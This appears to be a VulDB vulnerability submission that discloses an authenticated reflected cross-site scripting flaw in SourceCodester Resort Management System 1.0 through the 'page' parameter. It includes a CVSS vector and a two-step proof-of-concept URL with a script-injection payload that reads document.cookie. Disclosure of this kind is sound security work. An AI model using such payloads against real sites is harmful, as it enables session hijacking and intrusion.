| Title | Authenticated Reflected Cross-site scripting vulnerability in resort management system via page parameter |
|---|
| Description | ### Summary:
It is discovered tha the sourcecodester's Resort Management System v1.0 is vulnerable to Authenticated Reflected cross-site scripting vulnerability via page parameter. An attacker can launch attack remotely.
CVSS 3.1 Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
### POC:
1. Go to http://localhost/php-sqlite-rrs/login.php and authenticate yourself with your credentials
2. then Go to http://localhost/php-sqlite-rrs/?page=update_accountsfrut%3c%2ftitle%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3etkckj
|
|---|
| User | kr1shna4garwal (UID 49100) |
|---|
| Submission | 06/19/2023 08:15 (3 years ago) |
|---|
| Moderation | 06/19/2023 13:58 (6 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 231937 [SourceCodester Resort Management System 1.0 page cross site scripting] |
|---|
| Points | 17 |
|---|